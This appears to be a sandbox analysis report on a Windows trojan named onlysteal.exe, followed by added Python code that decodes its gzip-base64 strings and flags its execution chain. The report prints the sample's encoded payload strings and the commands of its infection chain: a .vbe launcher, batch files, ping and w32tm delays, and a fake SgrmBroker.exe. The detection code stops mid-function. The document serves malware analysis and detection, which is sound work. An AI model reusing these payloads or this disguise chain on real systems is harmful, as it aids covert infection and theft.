                                  Source: C:\Users\user\Desktop\onlysteal.exeCode function: 0_2_00243E0B0_2_00243E0B
                                  Source: C:\Users\user\Desktop\onlysteal.exeCode function: 0_2_00254F9A0_2_00254F9A
                                  Source: C:\Users\user\Desktop\onlysteal.exeCode function: 0_2_0023EFE20_2_0023EFE2
                                  Source: C:\Intorefnet\hyperBlockCrtCommon.exeCode function: 5_2_00007FFD34891D555_2_00007FFD34891D55
                                  Source: C:\Intorefnet\hyperBlockCrtCommon.exeCode function: 5_2_00007FFD34881EC35_2_00007FFD34881EC3
                                  Source: C:\Intorefnet\hyperBlockCrtCommon.exeCode function: 5_2_00007FFD348F08E15_2_00007FFD348F08E1
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeCode function: 11_2_00007FFD348B1D5511_2_00007FFD348B1D55
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeCode function: 11_2_00007FFD348A1EC311_2_00007FFD348A1EC3
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeCode function: 11_2_00007FFD349108E111_2_00007FFD349108E1
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeCode function: 11_2_00007FFD348A5BF211_2_00007FFD348A5BF2
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeCode function: 11_2_00007FFD34A80AED11_2_00007FFD34A80AED
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeCode function: 11_2_00007FFD34A8209D11_2_00007FFD34A8209D
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeCode function: 17_2_00007FFD348D1D5517_2_00007FFD348D1D55
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeCode function: 17_2_00007FFD348C1EC317_2_00007FFD348C1EC3
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeCode function: 17_2_00007FFD349308E117_2_00007FFD349308E1
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeCode function: 17_2_00007FFD348C5BF217_2_00007FFD348C5BF2
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeCode function: 22_2_00007FFD348A1D5522_2_00007FFD348A1D55
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeCode function: 22_2_00007FFD34891EC322_2_00007FFD34891EC3
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeCode function: 22_2_00007FFD349008E122_2_00007FFD349008E1
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeCode function: 22_2_00007FFD34A70AED22_2_00007FFD34A70AED
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeCode function: 22_2_00007FFD34A7209D22_2_00007FFD34A7209D
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeCode function: 27_2_00007FFD3490337B27_2_00007FFD3490337B
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeCode function: 27_2_00007FFD34902AF327_2_00007FFD34902AF3
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeCode function: 27_2_00007FFD349029F227_2_00007FFD349029F2
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeCode function: 27_2_00007FFD349027ED27_2_00007FFD349027ED
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeCode function: 27_2_00007FFD34891EC327_2_00007FFD34891EC3
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeCode function: 27_2_00007FFD348A1D5527_2_00007FFD348A1D55
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeCode function: 27_2_00007FFD349008E127_2_00007FFD349008E1
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeCode function: 27_2_00007FFD34A70AED27_2_00007FFD34A70AED
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeCode function: 27_2_00007FFD34A7209D27_2_00007FFD34A7209D
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeCode function: 27_2_00007FFD348A296127_2_00007FFD348A2961
                                  Source: C:\Users\user\Desktop\onlysteal.exeCode function: String function: 0024EB78 appears 39 times
                                  Source: C:\Users\user\Desktop\onlysteal.exeCode function: String function: 0024EC50 appears 56 times
                                  Source: C:\Users\user\Desktop\onlysteal.exeCode function: String function: 0024F5F0 appears 31 times
                                  Source: onlysteal.exe, 00000000.00000003.2088603398.000000000604E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameVisualStudio.Shell.Framework.dll$ vs onlysteal.exe
                                  Source: onlysteal.exe, 00000000.00000003.2090139525.0000000006946000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameVisualStudio.Shell.Framework.dll$ vs onlysteal.exe
                                  Source: onlysteal.exe, 00000000.00000003.2089878775.000000000694D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameVisualStudio.Shell.Framework.dll$ vs onlysteal.exe
                                  Source: onlysteal.exe, 00000000.00000003.2091936651.0000000002860000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamewscript.exe.mui` vs onlysteal.exe
                                  Source: onlysteal.exe, 00000000.00000003.2091936651.0000000002860000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamewscript.exe` vs onlysteal.exe
                                  Source: onlysteal.exeBinary or memory string: OriginalFilenameVisualStudio.Shell.Framework.dll$ vs onlysteal.exe
                                  Source: onlysteal.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                                  Source: 0.3.onlysteal.exe.699b6de.1.raw.unpack, E32.csCryptographic APIs: 'TransformBlock'
                                  Source: 0.3.onlysteal.exe.699b6de.1.raw.unpack, E32.csCryptographic APIs: 'TransformFinalBlock'
                                  Source: 0.3.onlysteal.exe.699b6de.1.raw.unpack, E32.csCryptographic APIs: 'TransformFinalBlock', 'TransformBlock'
                                  Source: 0.3.onlysteal.exe.609c6de.0.raw.unpack, E32.csCryptographic APIs: 'TransformBlock'
                                  Source: 0.3.onlysteal.exe.609c6de.0.raw.unpack, E32.csCryptographic APIs: 'TransformFinalBlock'
                                  Source: 0.3.onlysteal.exe.609c6de.0.raw.unpack, E32.csCryptographic APIs: 'TransformFinalBlock', 'TransformBlock'
                                  Source: 0.3.onlysteal.exe.699b6de.1.raw.unpack, s67.csBase64 encoded string: 'H4sIAAAAAAAEADSbx3KDyhKG3+VuWZDTUoicM4izIuecefqDT9V1VbsseZgZMd1//59k//PP/0RslT7//zIumkHL1M5UhNSePZHldkmVtZwh/6oUNd8yRms+zun8opaD7hguo1U+Jb3/RDfkVFduj+Upsr/fU7ns4rQedGL51ygkVr5O8Tt9zSH6PL+CRH2NNJ4ZDytyN0lwL8iBBsyN9rMwQpaZ2MkZnZABvYGx7hVsDouqRJR0pGoQg/3iQIvPMfuXgS1ejmnmYspmhMkPcjvGYAcZiKa5j4iPvCG2iWhxaPaZhhwDiltgcjf45pp9Z4AQTpIwA9p6YZRYGvJjwAficGzLt3RNea7DRa6mCT2E3h+LrHQ92b7ENrTl/HlKqioaSKLXITlnUs3rSaVn8OFPkFWvefGWRRgUb5xACgSygjyPh7aOYx21jZo379MsoDXaCVCp4EKP4MiHGvepwgyufoVpAs0PKFwUwZEtGxGXTkn1ty9nnqFPNH0LAouRkRDIfFDPa1NBrNAMY7lVTtpXY9BzDlwqMmKKJ/NEx3481/epe7sL/usBASyunQhificCYwH2fqd//cKcP8FMEAc/zyvdbMEgfNMCKkT4BxNaY/5yiY7BPDdtV37AaCfwprvpo+gHXk33fTjycEcBfBVFVXNBqigsmERpGGdpwQ/HAgWdw7cLsjsWlV+e5w5iVLw8SvZ510CKu7MNtNgD48moLM1H4Ln3Ai5oCgGJZ0CJcwvhL7AMfkg/J4QR5IbfCIWB7wFtW0oFBb3gM/keTCjgQAaCSoHgzr4LCY9jk3IAEIUr2TgApLqY2/Mxlp3I881IEws/DBM1UxzMPJqD5IMk+t1BoP4h15LL8kMYCKwOD7EoGA5es7VgOzPGwEKnD/MhR4ClRLLZkV/RlDFAU6SmoThVCCbKGkhooDtwlGESHg4RbWsG0NNDUZE5JDFIWX0RxuO47vNzNCOSDldGETRGD7wLQssFvTeEdHCFSTxi1+pUjFQMTKlqecaED1UXnHo4A41dzOBJOwRSrBpdULPtmRIUKswInfe4wZE2RdAieb7e8TWIhyQugsFCijJMMl713UQHkE/aPKXQhz3UsHieh4ZY6qfCMH3qlGkKTce8+YiGwRE+BEnjtKusxZbR6PeGKBq8KFTZixxE1LECC+cYjh3hu2KIS5Ik2qukHTFBuw+FO0XhNwm2Nkh+kfe15uE7a7rCYA7E4F4jQGyCDtuTKUZGULGB00nx/PFkQzfjY1MhD0DwXZZB1LHH4nxmc0HT8A4K2iHyOUibAbiwINKnQ3FtJOVRewSumYj6UYAsYlS2FDkBOI0doZ+RXijTFAiOozrAD3JF/rJtJP1AaIEWCycTO2IEQeEQGV+52YM+wqGrGD0jqjBxiJI3yKzDTGyiEUNGsQgCpoBGudGLKtho6Y4EKuKgBbQcRw2lQalTV6jCQrkc1YRP1lgidW5P1j359+R9R9/C2tn3ZtibTU8ZDV/y5ozrdEP+4FA7KHc6Tvc8KEQ6Rvc0KEG6RHczKPvaMdEk38OgUKtf45baWbs3/Ub+3kNFpN/HQaBM6XTjrtrlocJ7dxheBFEslLm3JJCbsTx4YEFv8J64v4P+9g5dlL7xA1j6c9gqdIO/Y9THDuCKPYRqWjm6AbuAHlZMSAD5Y9rchMoIqwDKZkjdhHYJMfXBAlcONL1w4parvq+DPLwO7Is6H3SSI6Jc4FIFzgLukSRw0aDb8m2HaXovacjYbxjJgRNBcvS7UA3B+zvozXsWhTG8iPfXX7Bqxu/TDwjb/9H1DGOd36Ab076FlewmvTyvfgFGXrhnVWUHghBSmNNnUWoiYBQyQHS4eaMHTqEk8D4kh8v3r7mYcZT3K9qDEMoFRqRG
wQTqoRhsgQbVdNll6gw/TXK08Q5TGM3M7G+gWTRcjykBdTp/oAvRxG4RmJPuR3Y/OuBH2yIPq4qCvNmvGbCX6eMf3+Thv7O3GEd2uOCwIQkkCJnKCiFSGmLzAHOA7BIy4woJoQrMia5c6Inmkiuna4LxsTzk/GCDsUybZqCPeX+Uto8nQm+9hCil5y4OZ6pv1PL3N33HgPkI8/iA1hqBKI8IJkCbj3qzQT98EcKRs1fgPyKJOmPSMgjY25TN2fwgSBxI/4o0W6St9rwIG6ikEVeVlEyMgFhA/56Y77IhYUILTM8LKOu+e+DRu6MJxFIifhXt9Dh7HKXmtBiR/0CBxzK2bXQMh3gfG/95DT3Dv5T5EjZPnxoXU8AVccWgU/JeVj9RNJlfqT5zUcfjQBzjbdoxTe2xJ9HcXfVc8HzNJksVEUW/pkyd6YCFLc+dMtz9QmKzPzUUaihlKGnRVoOq//AVTys4VoRfIsBDAgdoDYzY0PmHcis07F5kZV2zke6SFJH+phS0jX8B+exZa7GWjxzUU/2ef1TXMp/yxBrCNnIFnF6HcW6Dgk24ucrOrjsX8YR5l74ouunadvm4kcs7c2Zexa2GiGvqxkBiGl1D4OgSPj1k5mxdYl4jbSkQVWEdFFZpiAGzvx5ukdUZIKLpTKBFGcw7yaoeJ2KJHZcVveT1X6LcuIoTH54mkS3ipvXhWb5HOeKceCglUliA/zrGbwCF23qet91rzQxzoO8QsYCoe/ye7nkiWe+WUnNojbvFJvAFlECMIkSKokVZVwZ27GyOWKoJRW265kVANG6usAFjxrKPCp6UwSAcdUAE5DicKKP6IHBXW713L5AkHZOJFsp79eBsLKEljDBk/73fW70EsSHR48SOpEaOCUP8SCIa5Frgw9PSvkUPxOflos/UysBU065hcmpQo+/EfqQJxKe8pi95MY4AkJ6PJFRgfp5RuO8jnw7BwdzCirF9C6cdyDfzy/OYoyCo09/xvBYzrxvZkmM0bAiyOxKTfzFvd1V+qt+klR4KQGAMX7dXzS9Gqtr6NSOPPELgc0JjKJ10RqoHjuVXUblYj9LX2VoRFARD8C1wUS3eawqC7ArI7ufaWzQ
Source: 0.3.onlysteal.exe.699b6de.1.raw.unpack, 8B6.cs | Base64 encoded string: 'H4sIAAAAAAAEAMsoKSkottLXzyzIzEvL18vM188qzs8DACTOYY8WAAAA', 'H4sIAAAAAAAACssoKSkottLXTyzI1Mss0CtO0k9Pzc8sAABsWDNKFwAAAA=='
Source: 0.3.onlysteal.exe.699b6de.1.raw.unpack, 76n.cs | Base64 encoded string: '/xvwBzgSWkJJgHxRwwpSH/Ij/adcJB2Y7U4j2KALS+VcmR2PM3EjZaaKUPsruNk/bxXv5umeNrau3QzqFTTxNOzq9qbTO/v4f5W7pha3Vy1gURf7SLXA5r9cpub83QEFwA4gE5upqbkkLWRhO2l/rcW3YHhjwSHzGDbZu3cyF/U='
Source: 0.3.onlysteal.exe.699b6de.1.raw.unpack, 52Z.cs | Base64 encoded string: 'ICBfX18gICAgICAgICAgIF8gICAgICBfX18gICAgICAgICAgICAgXyAgICAgICAgXyAgIF9fXyAgICBfIF9fX19fIA0KIHwgICBcIF9fIF8gXyBffCB8X18gIC8gX198XyBfIF8gIF8gX198IHxfIF9fIF98IHwgfCBfIFwgIC9fXF8gICBffA0KIHwgfCkgLyBfYCB8ICdffCAvIC8gfCAoX198ICdffCB8fCAoXy08ICBfLyBfYCB8IHwgfCAgIC8gLyBfIFx8IHwgIA0KIHxfX18vXF9fLF98X3wgfF9cX1wgIFxfX198X3wgIFxfLCAvX18vXF9fXF9fLF98X3wgfF98X1wvXy8gXF9cX3wgIA0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHxfXy8gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIA=='
Source: 0.3.onlysteal.exe.609c6de.0.raw.unpack, s67.cs | Base64 encoded string: (identical to the s67.cs string reported for 0.3.onlysteal.exe.699b6de.1.raw.unpack above; deduplicated)
Source: 0.3.onlysteal.exe.609c6de.0.raw.unpack, 8B6.cs | Base64 encoded string: 'H4sIAAAAAAAEAMsoKSkottLXzyzIzEvL18vM188qzs8DACTOYY8WAAAA', 'H4sIAAAAAAAACssoKSkottLXTyzI1Mss0CtO0k9Pzc8sAABsWDNKFwAAAA=='
Source: 0.3.onlysteal.exe.609c6de.0.raw.unpack, 76n.cs | Base64 encoded string: '/xvwBzgSWkJJgHxRwwpSH/Ij/adcJB2Y7U4j2KALS+VcmR2PM3EjZaaKUPsruNk/bxXv5umeNrau3QzqFTTxNOzq9qbTO/v4f5W7pha3Vy1gURf7SLXA5r9cpub83QEFwA4gE5upqbkkLWRhO2l/rcW3YHhjwSHzGDbZu3cyF/U='
Source: 0.3.onlysteal.exe.609c6de.0.raw.unpack, 52Z.cs | Base64 encoded string: 'ICBfX18gICAgICAgICAgIF8gICAgICBfX18gICAgICAgICAgICAgXyAgICAgICAgXyAgIF9fXyAgICBfIF9fX19fIA0KIHwgICBcIF9fIF8gXyBffCB8X18gIC8gX198XyBfIF8gIF8gX198IHxfIF9fIF98IHwgfCBfIFwgIC9fXF8gICBffA0KIHwgfCkgLyBfYCB8ICdffCAvIC8gfCAoX198ICdffCB8fCAoXy08ICBfLyBfYCB8IHwgfCAgIC8gLyBfIFx8IHwgIA0KIHxfX18vXF9fLF98X3wgfF9cX1wgIFxfX198X3wgIFxfLCAvX18vXF9fXF9fLF98X3wgfF98X1wvXy8gXF9cX3wgIA0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHxfXy8gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIA=='
Source: 0.3.onlysteal.exe.609c6de.0.raw.unpack, m9F.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.3.onlysteal.exe.609c6de.0.raw.unpack, m9F.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.3.onlysteal.exe.699b6de.1.raw.unpack, m9F.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.3.onlysteal.exe.699b6de.1.raw.unpack, m9F.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
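The two 8B6.cs strings above start with H4sI, which is the base64 form of the gzip magic bytes 1f 8b 08, so they are gzip-compressed and then base64-encoded rather than plain base64. The Python below is an added example for this report, not code from Joe Sandbox or from the sample: it selects such tokens from a blob of decompiled source, gunzips them (gzip.decompress also verifies the CRC32 and length trailer, so corrupted streams are rejected rather than mis-decoded) and returns the plaintext. The token regex and the surrounding C#-like text are constructed for the example; the two tokens are quoted from the report and decode to the geolocation lookup URLs https://ipinfo.io/json and https://api.ip.sb/geoip.

```python
"""Decode gzip+base64 ("H4sI...") strings from a .NET payload's decompiled
source.  Added example for this report; not Joe Sandbox or sample code."""
from __future__ import annotations

import base64
import binascii
import gzip
import re
import zlib

# base64("\x1f\x8b\x08") == "H4sI", so this prefix is a cheap, reliable
# selector for gzip streams hidden in string constants.
GZIP_MAGIC = b"\x1f\x8b\x08"
# Constructed for this example: a base64 alphabet run of at least 16 chars
# after the magic, with optional padding.
_B64_TOKEN = re.compile(r"H4sI[A-Za-z0-9+/]{16,}={0,2}")

# Quoted from the 8B6.cs entries in the report above.
REPORT_STRINGS = [
    "H4sIAAAAAAAEAMsoKSkottLXzyzIzEvL18vM188qzs8DACTOYY8WAAAA",
    "H4sIAAAAAAAACssoKSkottLXTyzI1Mss0CtO0k9Pzc8sAABsWDNKFwAAAA==",
]


def is_gzip_b64(token: str) -> bool:
    """True if token is well-formed base64 whose payload starts with the gzip magic."""
    try:
        raw = base64.b64decode(token, validate=True)
    except (binascii.Error, ValueError):
        return False
    return raw.startswith(GZIP_MAGIC)


def decode_gzip_b64(token: str) -> bytes:
    """base64 -> gzip -> plaintext.  gzip.decompress checks CRC32 and ISIZE."""
    return gzip.decompress(base64.b64decode(token, validate=True))


def extract_gzip_b64(text: str) -> list[tuple[str, bytes]]:
    """Find every H4sI... token in text and return (token, plaintext) pairs.
    Tokens that are not valid base64, not gzip, or have a damaged deflate
    stream or trailer are skipped instead of aborting the scan."""
    found = []
    for match in _B64_TOKEN.finditer(text):
        token = match.group(0)
        if not is_gzip_b64(token):
            continue
        try:
            found.append((token, decode_gzip_b64(token)))
        except (OSError, EOFError, zlib.error):  # BadGzipFile, truncated, bad deflate
            continue
    return found


# Constructed sample input: the report's two tokens plus a decoy that has the
# gzip magic but a garbage deflate body (all zero bytes), which must be skipped.
SAMPLE_SOURCE = (
    'string a = "%s";\nstring b = "%s";\nstring c = "%s";\n'
    % (REPORT_STRINGS[0], REPORT_STRINGS[1], "H4sIAAAAAAAAAAAAAAAAAAAA")
)

if __name__ == "__main__":
    for token, plain in extract_gzip_b64(SAMPLE_SOURCE):
        print(f"{token[:24]}... -> {plain!r}")
```

Run it over the whole set of strings the sandbox dumped (or over the output of a .NET decompiler) and every gzip-wrapped constant comes out in clear, which is where DCRat-style samples keep their geolocation and C2 URLs; the same prefix test works on memory dumps because the base64 text survives in the managed heap.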
Source: classification engine | Classification label: mal100.troj.evad.winEXE@45/39@0/1
Source: C:\Users\user\Desktop\onlysteal.exe | Code function: 0_2_00236C74 GetLastError,FormatMessageW
Source: C:\Users\user\Desktop\onlysteal.exe | Code function: 0_2_0024A6C2 FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,CreateStreamOnHGlobal,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree
Source: C:\Intorefnet\hyperBlockCrtCommon.exe | File created: C:\Program Files (x86)\internet explorer\SIGNUP\IadHSrMxJwYAMPkyRTLDEKgeW.exe
Source: C:\Intorefnet\hyperBlockCrtCommon.exe | File created: C:\Users\user\Desktop\vmGXvtnF.log
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5360:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5292:120:WilError_03
Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exe | Mutant created: NULL
Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\ebfe70ca8abacc37de1b3f373e3a32ec899572a7484d84d302662c41dc4d8e50
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1976:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2720:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1112:120:WilError_03
Source: C:\Intorefnet\hyperBlockCrtCommon.exe | File created: C:\Users\user\AppData\Local\Temp\gQ3ZGmOMEF
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Intorefnet\Te60v9QbFjSF8KEQUR.bat" "
Source: C:\Users\user\Desktop\onlysteal.exe | Command line argument: sfxname | 0_2_0024DF1E
Source: C:\Users\user\Desktop\onlysteal.exe | Command line argument: sfxstime | 0_2_0024DF1E
Source: C:\Users\user\Desktop\onlysteal.exe | Command line argument: STARTDLG | 0_2_0024DF1E
Source: C:\Users\user\Desktop\onlysteal.exe | Command line argument: xz( | 0_2_0024DF1E
Source: onlysteal.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: onlysteal.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
Source: C:\Users\user\Desktop\onlysteal.exe | File read: C:\Windows\win.ini
Source: C:\Users\user\Desktop\onlysteal.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: onlysteal.exe | ReversingLabs: Detection: 71%
Source: onlysteal.exe | Virustotal: Detection: 76%
Source: C:\Users\user\Desktop\onlysteal.exe | File read: C:\Users\user\Desktop\onlysteal.exe
Source: unknown | Process created: C:\Users\user\Desktop\onlysteal.exe "C:\Users\user\Desktop\onlysteal.exe"
Source: C:\Users\user\Desktop\onlysteal.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Intorefnet\wF0tJ2zNcmafpzDn9Ons.vbe"
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Intorefnet\Te60v9QbFjSF8KEQUR.bat" "
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Intorefnet\hyperBlockCrtCommon.exe "C:\Intorefnet/hyperBlockCrtCommon.exe"
Source: C:\Intorefnet\hyperBlockCrtCommon.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\fmCyxdZe80.bat"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exe "C:\Users\Default\Start Menu\Programs\SgrmBroker.exe"
Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\zuhvZR4ed0.bat"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exe "C:\Users\Default\Start Menu\Programs\SgrmBroker.exe"
Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\szcAPjpm25.bat"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exe "C:\Users\Default\Start Menu\Programs\SgrmBroker.exe"
Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\Y6Uf3masa9.bat"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exe "C:\Users\Default\Start Menu\Programs\SgrmBroker.exe"
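The process tree above is the behaviour the Sigma signatures in this report name: wscript.exe run on a .vbe from an ad-hoc root folder (C:\Intorefnet), cmd.exe batches that stall with ping -n 10 localhost or w32tm /stripchart /computer:localhost before launching the next stage, and a payload named after the Windows binary SgrmBroker.exe executed from the Default user's Start Menu instead of System32. The Python below is an added example for this report, not code from Joe Sandbox or from the sample: it applies those checks to process-creation events. The events are constructed from the command lines listed above plus two benign negatives (chcp, and the real SgrmBroker.exe under System32); the rule names, the list of binaries that belong only in System32, the set of normal root folders and the ping count threshold of three or more are this example's own assumptions.

```python
"""Flag the execution-chain patterns seen in the process tree above.
Added example for this report; not Joe Sandbox or sample code."""
from __future__ import annotations

import ntpath
import re

# Assumption: Windows binaries that legitimately live only under System32 /
# SysWOW64.  SgrmBroker.exe is the one this sample impersonates; extend as needed.
SYSTEM_BINARIES = {"sgrmbroker.exe", "svchost.exe", "lsass.exe", "csrss.exe", "winlogon.exe"}
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")
# Assumption: roots under which executables normally sit; anything else directly
# under C:\ (such as C:\Intorefnet\) counts as a suspicious folder.
NORMAL_ROOTS = ("c:\\program files\\", "c:\\program files (x86)\\",
                "c:\\users\\", "c:\\windows\\", "c:\\programdata\\")

_SLEEP_PING = re.compile(r"\bping(?:\.exe)?\s+-n\s+(\d+)\s+(?:localhost|127\.0\.0\.1)\b", re.I)
_SLEEP_W32TM = re.compile(r"\bw32tm(?:\.exe)?\s+/stripchart\s+/computer:localhost\b", re.I)


def _norm(path: str) -> str:
    """Strip quotes, normalise separators (the sample uses a forward slash
    in C:\\Intorefnet/hyperBlockCrtCommon.exe) and lower-case."""
    return ntpath.normpath(path.strip('"')).lower()


def system_name_in_unexpected_location(image: str) -> bool:
    n = _norm(image)
    return ntpath.basename(n) in SYSTEM_BINARIES and not n.startswith(SYSTEM_DIRS)


def execution_from_suspicious_folder(path: str) -> bool:
    n = _norm(path)
    return n.startswith("c:\\") and not n.startswith(NORMAL_ROOTS)


def living_off_the_land_sleep(cmdline: str) -> str | None:
    """ping -n N localhost and w32tm /stripchart /computer:localhost have no
    network purpose and exist only to delay; return which was used, or None."""
    m = _SLEEP_PING.search(cmdline)
    if m and int(m.group(1)) >= 3:        # assumption: -n 1/-n 2 is too short to matter
        return "ping"
    if _SLEEP_W32TM.search(cmdline):
        return "w32tm"
    return None


def script_host_from_suspicious_folder(image: str, cmdline: str) -> bool:
    """wscript/cscript launching a script file that sits in a suspicious folder."""
    if ntpath.basename(_norm(image)) not in {"wscript.exe", "cscript.exe"}:
        return False
    for quoted, bare in re.findall(r'"([^"]+)"|(\S+)', cmdline):
        arg = quoted or bare
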